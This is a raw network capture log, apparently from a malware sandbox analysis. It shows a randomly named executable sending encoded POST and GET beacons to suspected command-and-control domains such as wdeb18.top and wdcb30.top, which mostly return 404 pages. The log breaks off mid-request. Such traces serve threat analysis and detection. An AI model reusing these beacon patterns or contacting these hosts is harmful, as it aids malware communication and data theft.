                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.11.3049944206.119.82.147804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:41.190337896 CEST2578OUTPOST /vacs/ HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.wdeb18.top
                                              Referer: http://www.wdeb18.top/vacs/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 41 79 55 56 39 68 41 72 35 38 4b 33 31 72 43 76 77 57 6e 57 6d 53 2f 4e 54 69 31 72 48 38 49 58 6c 55 38 76 38 75 65 54 69 6a 69 49 32 50 6a 6a 54 41 4b 53 33 46 65 4d 49 52 58 35 36 75 6d 61 64 75 72 72 65 4b 76 43 70 35 77 31 76 66 34 6b 46 46 30 33 6a 2b 56 5a 70 76 58 63 6e 33 33 46 6f 62 68 51 34 47 2b 6d 53 65 2b 45 36 68 71 65 75 44 34 74 47 54 69 58 57 54 54 64 59 39 6d 71 34 6f 36 48 78 7a 4f 6e 41 50 6f 32 54 69 66 69 73 61 51 79 38 41 68 44 45 6d 55 64 66 34 37 75 32 37 33 4b 4e 32 78 59 77 47 4b 43 79 64 54 42 70 44 61 53 44 6b 65 49 4b 37 4a 6c 74 32 51 53 45 77 54 2b 35 34 58 6c 59 55 6d 53 56 66 65 4f 75 30 52 65 6b 70 49 7a 33 7a 33 69 31 56 38 77 74 72 6f 6b 77 53 51 61 6a 68 4c 66 50 69 43 6a 54 36 55 63 2b 32 64 79 6d 75 2b 4c 4d 64 2b 55 2f 75 48 48 51 31 66 32 6f 65 66 48 66 65 37 34 56 77 41 2f 76 57 71 38 30 39 44 32 32 45 35 4b 69 39 5a 4b 79 65 43 72 4f 32 62 4e 4d 4d 66 37 31 6e 57 50 36 2b 51 45 59 2b 44 67 6b 42 2b 57 5a 31 30 64 73 53 64 50 54 36 31 42 34 77 [TRUNCATED]
                                              Data Ascii: 7LY=AyUV9hAr58K31rCvwWnWmS/NTi1rH8IXlU8v8ueTijiI2PjjTAKS3FeMIRX56umadurreKvCp5w1vf4kFF03j+VZpvXcn33FobhQ4G+mSe+E6hqeuD4tGTiXWTTdY9mq4o6HxzOnAPo2TifisaQy8AhDEmUdf47u273KN2xYwGKCydTBpDaSDkeIK7Jlt2QSEwT+54XlYUmSVfeOu0RekpIz3z3i1V8wtrokwSQajhLfPiCjT6Uc+2dymu+LMd+U/uHHQ1f2oefHfe74VwA/vWq809D22E5Ki9ZKyeCrO2bNMMf71nWP6+QEY+DgkB+WZ10dsSdPT61B4wErZB06EUmt4s1trF/8qOKOx6Huu/fSdrthX5bL6f9LXM6JcTS0SzY3uINzeSNkYCJqfVzfk/Efg58sW553mzT0vMLZKqo+GFhgozOXo6PglFwJ/RuVXS88Yem7vlYJ8Jm3Fx8XRu2BF/SPn+NsTJMNQrpuhhIQDicYP1u6c+SKmgWP8kj7n/S+6X7NB522uqb42fdwIxDmpj9nX/JZOvrZsZY+EyEeRzP+uaMsTQuJrTtuQRL9qLFONB5H6SFQ8nojArZD+L4ZXqU7sujPf047tXA8bgqLRMkxIncQhsfnW6/GkEkVmGqesF9UP5cEVJI0VEOBBnv+Z8/B7hwqi3PP8+2f/hS03oyYIJE4aOdpRk6Ae2jY807pMiWO0l2AUomYa/K9q7WtO7rOOnpyeG0k+dmC4UeO88MFDA5l6j4EIoIM8P5h8sZNVMR9X7MNd2Z2QREDFwzpAcZcj1mh+MJ9k56iM7FrA/fUv8webk61LKFNC+YbbLfUVUbZAaUrqlq54ktiG027AyNIsvssVEMU+sIgoKA6l1VWn4mdWzsFOhYURm6c/3V6SGSK7TRLq8wwDPokpfhToIvUaXf/pI0D9lLgr0X0b98yJ3Kfw471j9geTtksskUmE07nOtzB8vzgB2Z0d6q6LPnZqtONjIHuJvTOQN0xVrNP [TRUNCATED]
                                              Sep 24, 2024 11:29:41.190356970 CEST1314OUTData Raw: 73 69 54 71 57 65 34 4e 5a 50 6f 61 71 69 51 53 57 49 72 42 55 70 45 61 53 79 77 54 4e 53 50 62 4b 61 42 47 43 4f 4b 43 2b 45 4b 6d 43 43 4d 56 37 30 73 67 32 68 51 6a 6a 4e 4d 68 4b 32 67 52 39 47 77 42 42 35 53 48 44 61 43 33 41 58 64 5a 30 38
                                              Data Ascii: siTqWe4NZPoaqiQSWIrBUpEaSywTNSPbKaBGCOKC+EKmCCMV70sg2hQjjNMhK2gR9GwBB5SHDaC3AXdZ08t1vQUxP6fKf1XBeRUESn1HfRH9QDIWyzk2zvcecoMMfi6e2cGm7LTrO5AbHgZkuVhVfMzbltjV3jTub3ljaeyy3oFFzsQSmpcN9b0JW1yD+kOxiwFZhZZlbkAByYoeosTS1cQWFzbrKHaCaOWhwzpiWt3kLFqbcQ1
                                              Sep 24, 2024 11:29:41.505600929 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.11.3049945206.119.82.147804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:44.048887968 CEST490OUTGET /vacs/?7LY=Nw81+Usn0fanr8WCjEPwkk6RKTBWBdcWh3ZdisqFiDj5qtm6fUSc5UPRHiDGmrqRFt3sYIjXu/E976BkZ2ULyaZi6O7ym0jmurwAsFjcKbC3uyaytRFMIWQ=&Nze=C0klVT HTTP/1.1
                                              Host: www.wdeb18.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:44.367574930 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66aa3fcf-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.11.3049946208.91.197.27804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:52.607949972 CEST500OUTGET /4cb1/?7LY=XKNL1JD0m+kPKiRtwXvWadxi4lw/eMGyyubvbAiHS0Pw7N/QTVJnoSWf0VV+PqGNlgPtrFtsvm+9H+6jxRgj1ZWpayRlysea5sKDxNVo6arBefmKhfjh+4M=&Nze=C0klVT HTTP/1.1
                                              Host: www.brainchainllc.online
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:29:53.083487988 CEST844INHTTP/1.1 200 OK
                                              Date: Tue, 24 Sep 2024 09:29:52 GMT
                                              Server: Apache
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jq7WvaVVw2GzTWUtO3e1k/AlZy2zLW2ruPCVetemRPT8v48eBW20rMd118dofOTeJ2ImRdG+8A0gaar3j7dyYQ==
                                              Content-Length: 2640
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Sep 24, 2024 11:29:53.083523989 CEST339INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56
                                              Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_jq7WvaVVw2GzTWUtO3e1k/AlZy2zLW2ruPCVetemRPT8v48eBW20rMd118dofOTeJ2ImRdG+8A
                                              Sep 24, 2024 11:29:53.083539009 CEST1220INData Raw: 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 61 69 6e 63 68 61 69 6e 6c 6c 63 2e 6f 6e 6c 69 6e 65 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
                                              Data Ascii: ascript" src="http://www.brainchainllc.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.brainchainllc.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglo
                                              Sep 24, 2024 11:29:53.083553076 CEST1081INData Raw: 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0d 0a 20 20
                                              Data Ascii: all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              54192.168.11.3049947206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:29:58.423151016 CEST755OUTPOST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 6e 50 6d 57 6e 33 63 48 45 6c 38 58 47 41 50 70 58 48 78 72 58 47 70 4a 46 62 56 44 76 58 38 4e 76 4e 71 47 53 66 2f 4b 2b 2f 41 65 44 4b 63 56 33 6d 31 74 50 51 69 4e 31 35 49 4a 4c 5a 70 66 4e 59 48 66 4f 51 6d 5a 2b 54 58 54 63 55 75 67 73 4a 62 48 4b 30 65 42 46 47 4c 4e 59 79 32 4c 41 46 54 4f 6f 4b 68 46 6a 65 42 6e 67 4f 5a 6e 32 73 2f 58 79 73 5a 59 5a 39 6f 42 6b 43 71 48 70 73 69 59 5a 38 2f 64 59 65 42 4e 31 76 6f 59 37 70 67 51 52 38 79 45 64 5a 52 42 4e 44 58 37 48 66 6e 5a 46 79 58 34 4e 71 53 2b 74 48 42 64 56 6c 75 4a 77 3d 3d
                                              Data Ascii: 7LY=y9Ut54SIgwt80nPmWn3cHEl8XGAPpXHxrXGpJFbVDvX8NvNqGSf/K+/AeDKcV3m1tPQiN15IJLZpfNYHfOQmZ+TXTcUugsJbHK0eBFGLNYy2LAFTOoKhFjeBngOZn2s/XysZYZ9oBkCqHpsiYZ8/dYeBN1voY7pgQR8yEdZRBNDX7HfnZFyX4NqS+tHBdVluJw==
                                              Sep 24, 2024 11:29:58.737744093 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:29:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              55192.168.11.3049948206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:01.285279036 CEST775OUTPOST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 47 2f 6d 52 45 66 63 53 55 6c 39 53 47 41 50 6a 33 48 31 72 58 4b 70 4a 45 76 46 44 62 37 38 4f 4e 56 71 46 54 66 2f 4a 2b 2f 41 56 6a 4b 46 52 33 6d 75 74 4f 74 58 4e 33 39 49 4a 4c 39 70 66 50 41 48 65 35 45 68 59 75 54 56 65 38 55 73 2b 63 4a 62 48 4b 30 65 42 47 37 44 4e 59 36 32 58 6a 64 54 4f 4b 69 69 4d 44 65 65 33 41 4f 5a 74 57 74 58 58 79 74 38 59 62 4a 57 42 69 4f 71 48 72 30 69 59 4c 55 77 4f 34 65 44 43 56 75 4d 63 35 73 52 52 54 63 37 4e 4f 30 4a 59 63 36 72 36 51 75 39 45 47 47 56 72 74 57 2f 69 73 71 70 66 58 6b 31 55 77 74 79 72 38 33 70 33 4c 64 54 31 36 70 76 76 33 57 4a 2b 46 34 3d
                                              Data Ascii: 7LY=y9Ut54SIgwt80G/mREfcSUl9SGAPj3H1rXKpJEvFDb78ONVqFTf/J+/AVjKFR3mutOtXN39IJL9pfPAHe5EhYuTVe8Us+cJbHK0eBG7DNY62XjdTOKiiMDee3AOZtWtXXyt8YbJWBiOqHr0iYLUwO4eDCVuMc5sRRTc7NO0JYc6r6Qu9EGGVrtW/isqpfXk1Uwtyr83p3LdT16pvv3WJ+F4=
                                              Sep 24, 2024 11:30:01.603801012 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:30:01 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              56192.168.11.3049949206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:04.142028093 CEST2578OUTPOST /opa3/ HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.wdcb30.top
                                              Referer: http://www.wdcb30.top/opa3/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 79 39 55 74 35 34 53 49 67 77 74 38 30 47 2f 6d 52 45 66 63 53 55 6c 39 53 47 41 50 6a 33 48 31 72 58 4b 70 4a 45 76 46 44 62 7a 38 4e 2b 64 71 46 77 6e 2f 49 2b 2f 41 63 44 4b 41 52 33 6e 75 74 50 46 62 4e 33 67 39 4a 4e 35 70 5a 75 67 48 57 73 6f 68 53 75 54 56 58 63 55 74 67 73 4a 4f 48 4b 6b 61 42 46 44 44 4e 59 36 32 58 69 74 54 49 59 4b 69 4b 44 65 42 6e 67 4f 6a 6e 32 74 73 58 79 31 4b 59 62 64 47 42 67 75 71 48 59 4d 69 5a 34 38 77 4f 34 65 44 61 46 75 4e 63 34 51 55 52 54 30 52 4e 4b 42 38 59 49 43 72 37 30 33 61 55 31 48 43 2f 4d 6a 38 2f 39 47 43 65 57 4d 47 53 58 64 4c 69 39 4c 2b 77 4a 5a 64 30 4e 4e 62 77 30 58 54 39 69 45 49 70 58 75 43 45 59 4f 68 4e 2f 6e 61 74 6c 30 35 2f 71 75 6d 6d 4e 35 42 79 78 76 4d 61 41 34 42 2b 6c 78 49 48 73 36 66 36 6c 56 7a 30 44 37 6d 67 53 71 63 4c 54 65 30 62 6d 2b 71 4f 6a 68 54 30 57 64 31 41 5a 33 71 39 2b 7a 2b 4c 36 72 53 31 2f 52 68 46 58 45 32 48 34 59 79 44 74 4a 5a 6c 50 55 56 6c 2b 41 64 50 6a 63 36 77 58 78 71 69 4a 37 6c 6b 4c [TRUNCATED]
                                              Data Ascii: 7LY=y9Ut54SIgwt80G/mREfcSUl9SGAPj3H1rXKpJEvFDbz8N+dqFwn/I+/AcDKAR3nutPFbN3g9JN5pZugHWsohSuTVXcUtgsJOHKkaBFDDNY62XitTIYKiKDeBngOjn2tsXy1KYbdGBguqHYMiZ48wO4eDaFuNc4QURT0RNKB8YICr703aU1HC/Mj8/9GCeWMGSXdLi9L+wJZd0NNbw0XT9iEIpXuCEYOhN/natl05/qummN5ByxvMaA4B+lxIHs6f6lVz0D7mgSqcLTe0bm+qOjhT0Wd1AZ3q9+z+L6rS1/RhFXE2H4YyDtJZlPUVl+AdPjc6wXxqiJ7lkLho97TjZ7Mcd1TBNURlRMV0DGcV3X+bDjEze0tylQd0tMXqkSH9aeQlv9I52RyhKbzaiTsBGDp1wweT4Gu7DWXO1AwoWbN7WWzVOmKoG5ahOY5s5aTXzo04mNjmqqfwgNi0Nm0JNXpIw3cQ95V5rHCGPS71Ki82gXIP1kQaHoi/ajemrQKEE6pd6QhuR1OxMFbwzNakWyfq00pDEEnlCHAURTLWEainUCfYg/WcVwtdvA6YUnXqYoiPGkKXe+ctSTNSnNN1pEcExtV1AVF/KYwmZxxYa0qHEuCRsuc7V03QFkOLh0LFdfw9WhHUBsXgQsIwCevuZm+n0VuPkMEb+ZjbHY5q8Uv70FV/XAQ3D2iXx6oFvgvIfDCIkGt68LytFv0aiUm4OK10mj7kYDVPMdrF/F4kVtUekmqbsV/2OL+NsLSrA1xLMu1pfLDJ/3zDPynDXLCyJ+BxY54nHZA2d8A65ZcA5JDIbG/4tBV97nOZUdB/blTZkgmGofL/HLcq5VXZWF2wLSGtS6KkNvF8zk9atYaBB1RH68oTNsItUfeXbT3K+agSAyA/lPC0Ku6l7m5ySZepKhXEn5TwExHFWD7qrkYrbd9xymGuDJM4ldGqfJZTsXqbZoLP8MRCta9Ut+aaHL3aBgHKZyQRZOMSg8NHBNBb3rAfyD9i [TRUNCATED]
                                              Sep 24, 2024 11:30:04.142046928 CEST1314OUTData Raw: 42 69 38 67 41 46 61 39 39 41 64 43 2b 30 57 4d 74 63 32 4e 6a 68 31 64 58 59 36 30 66 39 65 58 78 37 4b 73 41 62 74 54 34 6a 44 44 38 6c 65 49 70 6c 61 42 61 68 61 44 6f 30 4f 50 54 43 63 4c 77 49 6d 4a 35 4c 57 6f 44 6f 45 47 2b 6c 55 68 6f 5a
                                              Data Ascii: Bi8gAFa99AdC+0WMtc2Njh1dXY60f9eXx7KsAbtT4jDD8leIplaBahaDo0OPTCcLwImJ5LWoDoEG+lUhoZeKzwDtwmZSurg/2o224IexfX1eHXP/Kk/s4UWogJ3ZkV6RcwW9etQi73oJwy+XGJhzO+jnsWsIVnQ8bn7jqnPWHsn5gjSpRCnVlxYGfL8Kq//3LFTeuprYCda2IsQFj4UIMdm6Muq6OpUY0c87Dje58dnZW9VN8Zp
                                              Sep 24, 2024 11:30:04.546061039 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:30:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              57192.168.11.3049950206.119.82.131804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:06.993084908 CEST490OUTGET /opa3/?7LY=//8N6NGdtRkn6yq8W3OBQnInDVkPrmeKzEa9OWHVIp2tO8AGOHzwJOfidi6bYHK8g9UFVHI1UtpxcaY/CfI8S9y/PcE6w9RcCLRpAW2RNdWqNgB6ObbfL00=&Nze=C0klVT HTTP/1.1
                                              Host: www.wdcb30.top
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:30:07.308634996 CEST302INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Tue, 24 Sep 2024 09:30:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 138
                                              Connection: close
                                              ETag: "66a7ebf9-8a"
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              58192.168.11.3049951209.74.95.29804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:30:12.508598089 CEST758OUTPOST /h5ax/ HTTP/1.1
